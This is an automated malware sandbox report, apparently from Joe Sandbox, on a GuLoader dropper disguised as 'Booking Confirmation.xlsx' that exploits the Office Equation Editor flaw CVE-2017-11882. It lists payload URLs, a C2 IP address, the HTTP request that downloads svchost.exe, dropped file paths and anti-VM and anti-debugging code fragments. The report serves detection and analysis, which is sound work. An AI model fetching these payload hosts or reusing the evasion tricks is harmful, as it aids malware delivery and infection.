Analysis Report Booking Confirmation.xlsx

Overview

General Information

Sample Name: Booking Confirmation.xlsx
Analysis ID: 433966
MD5: 0ff57b2fd3fb489d3cca1e3de4fc98ea
SHA1: 48f428a33c81e6647c399a50a71e5ee03c1c2ef9
SHA256: 36e8b5e6839f88f144b51f690004f0464368d437d099fa74534fe1a6223a6ed2
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe Avira: detection malicious, Label: HEUR/AGEN.1134908
Source: C:\Users\Public\vbc.exe Avira: detection malicious, Label: HEUR/AGEN.1134908
Found malware configuration
Source: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe Virustotal: Detection: 28%
Source: C:\Users\Public\vbc.exe Virustotal: Detection: 28%
Multi AV Scanner detection for submitted file
Source: Booking Confirmation.xlsx ReversingLabs: Detection: 26%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 70MB
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 103.155.82.236:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Mon, 14 Jun 2021 06:54:23 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Sun, 13 Jun 2021 20:01:48 GMT ETag: "24000-5c4ab36086dc4" Accept-Ranges: bytes Content-Length: 147456 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TWIDC-AS-APTWIDCLimitedHK
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /nrsdoc/svchost.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 103.155.82.236 Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0F13A2C.emf
Source: F7B97C3D.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C6E96 NtAllocateVirtualMemory, 4_2_003C6E96
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C7008 NtAllocateVirtualMemory, 4_2_003C7008
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C6E50 NtAllocateVirtualMemory, 4_2_003C6E50
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C7084 NtAllocateVirtualMemory, 4_2_003C7084
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C6EE4 NtAllocateVirtualMemory, 4_2_003C6EE4
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C711E NtAllocateVirtualMemory, 4_2_003C711E
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C6F73 NtAllocateVirtualMemory, 4_2_003C6F73
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Booking Confirmation.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: svchost[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/17@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Booking Confirmation.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF0B4.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Booking Confirmation.xlsx ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: Booking Confirmation.xlsx Static file information: File size 1286656 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Booking Confirmation.xlsx Initial sample: OLE indicators vbamacros = False
Source: Booking Confirmation.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Yara detected GuLoader
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_004059CC pushfd ; iretd 4_2_004059D5
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406199 push ss; ret 4_2_004062BA
Source: C:\Users\Public\vbc.exe Code function: 4_2_00407E0A push ecx; iretd 4_2_00407E0C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004062BD push ss; ret 4_2_004062BA
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402F0B push dword ptr [ebp-1Ch]; ret 4_2_0041B724
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409B16 push ecx; retf 4_2_00409B23
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C1017 push 3966E195h; ret 4_2_003C1021
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C2C7F push 8566E195h; ret 4_2_003C2C89
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C1697 push 9EF9818Fh; ret 4_2_003C16A1
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C6D0B push 3966E195h; retf 4_2_003C6D15
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C2DEF push F6C88495h; ret 4_2_003C2DF9
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C05EB push 38BAFB8Fh; ret 4_2_003C05F5
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C1FE7 push F7BAE195h; ret 4_2_003C1FF1
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C1DC7 push 38BAE195h; ret 4_2_003C1DD1

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: Booking Confirmation.xlsx Stream path 'EncryptedPackage' entropy: 7.99982364057 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C42D3 4_2_003C42D3
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C37F2 4_2_003C37F2
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003C7154 second address: 00000000003C7154 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003CA078 second address: 00000000003CA078 instructions:
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003C7154 second address: 00000000003C7154 instructions:
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003CA021 second address: 00000000003CA078 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 53673179h 0x00000007 sub eax, 2CF91FC3h 0x0000000c xor eax, 4DAF12BEh 0x00000011 sub eax, 6BC10307h 0x00000016 cpuid 0x00000018 jmp 00007F767C7D7CDEh 0x0000001a pushad 0x0000001b rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003CA078 second address: 00000000003CA078 instructions:
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C3427 rdtsc 4_2_003C3427
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2316 Thread sleep time: -360000s >= -30000s

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C3427 rdtsc 4_2_003C3427
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C482B mov eax, dword ptr fs:[00000030h] 4_2_003C482B
Source: C:\Users\Public\vbc.exe Code function: 4_2_003CAA61 mov eax, dword ptr fs:[00000030h] 4_2_003CAA61
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C68D1 mov eax, dword ptr fs:[00000030h] 4_2_003C68D1
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C9CCF mov eax, dword ptr fs:[00000030h] 4_2_003C9CCF
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C9321 mov eax, dword ptr fs:[00000030h] 4_2_003C9321
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C479E mov eax, dword ptr fs:[00000030h] 4_2_003C479E
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C37F2 mov eax, dword ptr fs:[00000030h] 4_2_003C37F2
Source: C:\Users\Public\vbc.exe Code function: 4_2_003C47D2 mov eax, dword ptr fs:[00000030h] 4_2_003C47D2

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2370181572.0000000000960000.00000002.00000001.sdmp Binary or memory string: !Progman